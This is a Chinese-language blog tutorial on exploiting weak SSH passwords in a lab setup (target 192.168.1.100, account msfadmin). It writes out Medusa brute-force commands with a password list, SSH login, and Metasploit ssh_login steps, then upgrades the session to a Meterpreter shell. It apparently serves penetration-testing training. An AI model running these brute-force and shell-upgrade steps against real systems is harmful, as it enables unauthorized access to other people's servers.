当前位置:网站首页>6-5漏洞利用-SSH弱口令破解利用
6-5漏洞利用-SSH弱口令破解利用
2022-07-04 03:53:00 【山兔1】

破解完密码之后,获得对应的用户名,就可以使用ssh客户端软件,进行对应的登录,登录之后,我们就可以做很多的操作,获得shell,在shell当中,就可以执行对应的命令
Medusa ssh弱口令破解
如果在设置SSH服务时,管理员为了方便记忆设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使用对应的密码工具进行身份验证暴力破解弱口令,或者是用户名和密码同时破解的这么一个过程。从而获得一些容易猜解出来的这些用户名和密码,破解出来就可以使用对应的用户名和密码登录系统ssh
弱口令破解,验证了一句俗语,苍蝇不叮无缝的蛋,我们因为设置了弱口令,很有可能被破解出来,我们为了一时的方便,从而导致了系统的缺陷,是非常不适合的
下面介绍medusa对指定的ssh服务进行用户名和密码破解
medusa -h 192.168.1.100 -u msfadmin -p msfadmin -M ssh

通过-M指定要破解的服务,出现success表示破解成功,如果没有,就表示我们的字典当中不包含我们登录系统的一个用户名和密码组合
首先我们ping一下目标服务器
ping 192.168.1.100

medusa
//查看帮助信息

medusa -d

通过-d来列举出,我们已知的模块或协议,在我们破解的时候,我们要去掉.mod,直接ssh就可以
medusa -h 192.168.1.100 -u msfadmin -P /root/Desktop/pass.txt -M ssh

这个时候,要尝试我们每一次的密码,与对应的用户名是否匹配
SSH命令行工具登录
用ssh客户端登录ssh服务,进行操作,在没有任何图形化界面时,我们完全需要依靠命令行进行操作,或者是linux自带的工具,进行操作,更加高效的完成操作
一般情况下Linux下都具有ssh客户端,用来登录ssh服务端
可以使用ssh 用户名@IP地址 然后根据提示输入密码
默认情况下是22号端口,我们就不需要指定对应的端口了,当然,如果我们的ssh端口是其它端口,我们就需要-p指定对应的端口号
ssh [email protected]
msfadmin
id
ifconfig

登录之后,可以执行一些命令,他只是使用了ssh服务的登录
Metasploit利用SSH登录反弹shell
使用Metasploit可以进行ssh登录(根据破解的结果,进行自动登录),会自动建立对应的Bash shell连接。
medusa只做破解,而我们的metasploit会返回对应的结果,使得我们可以执行命令,他结合了medusa和ssh客户端的这样一个操作
set rhosts 192.168.1.100
set username msfadmin
set password msfadmin
run
sessions -l

msfconsole
//metasploit命令行控制的终端
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 192.168.1.100

set username msfadmin
show options

set password msfadmin
show options

run

sessions -l
sessions -i 1
id

ifconfig

Metasploit获取Meterperter shell
利用获得的Bash shell,注入Metasploit中Meterpreter payload从而获取更强大功能的shell。
sessions -u 1
//输入会话的id,就会注入对应的meterpreter payload
sessions -l
//使用session -l进行查看
sessions -i 3
//输入对应的payload id进行连接
id
pwd

边栏推荐
- dried food! Generation of rare samples based on GaN
- 【愚公系列】2022年7月 Go教学课程 001-Go语言前提简介
- What should a novice pay attention to when looking for an escort
- What is the difference between Western Digital Green disk, blue disk, black disk, red disk and purple disk
- Architecture practice camp - graduation project of module 9 of phase 6
- The interactive solution of JS and app in the H5 page embedded in app (parameters can be transferred and callbacks can be made)
- leetcode 121 Best Time to Buy and Sell Stock 买卖股票的最佳时机(简单)
- Flink learning 8: data consistency
- leetcode:1314. 矩阵区域和【二维前缀和模板】
- How to add custom API objects in kubernetes (1)
猜你喜欢

优秀的测试/开发程序员是怎么修炼的?该往哪走......

微信公众号无限回调授权系统源码
![[microservice openfeign] @feignclient detailed explanation](/img/8d/83bcde1355366c7c88a7a9ade7f9eb.png)
[microservice openfeign] @feignclient detailed explanation
Tcp- simple understanding of three handshakes and four waves

FT2000+下LPC中断绑核使用说明

架构实战营 - 第 6 期 模块九之毕业设计

Deep parsing structured exception handling (SEH) - by Matt Pietrek

Balloon punching and Boolean operation problems (extremely difficult)

Leetcode skimming: binary tree 09 (minimum depth of binary tree)

戳气球和布尔运算问题(巨难)
随机推荐
分布式CAP理论
MIN_RTO 对话
Statistical genetics: Chapter 3, population genetics
2020 Bioinformatics | TransformerCPI
UnicodeDecodeError: ‘gbk‘ codec can‘t decode byte 0x98 in position 1093: illegal multibyte sequence
I.MX6U-ALPHA开发板(模仿STM32驱动开发实验)
Wobo Union ended its strategic evaluation and decided to retain Bozi's business with excellent performance
Flink learning 8: data consistency
Rhcsa 07 - user and group management
架构实战营 - 第 6 期 模块九之毕业设计
Dry goods | detailed explanation of webshell Foundation
Imitation of "game bird" source code, mobile game issue evaluation, open service, open test collection, game download website template
网络 - VXLAN
更优雅地远程操作服务器:Paramiko库的实践
Unity资源路径
Apple CMS imitation watermelon video atmospheric response video template source code
虚拟商品帐号交易平台源码_支持个人二维码收款
What does software testing do? Find defects and improve the quality of software
Instructions for LPC interrupt binding under ft2000+
RHCSA 01 - 创建分区与文件系统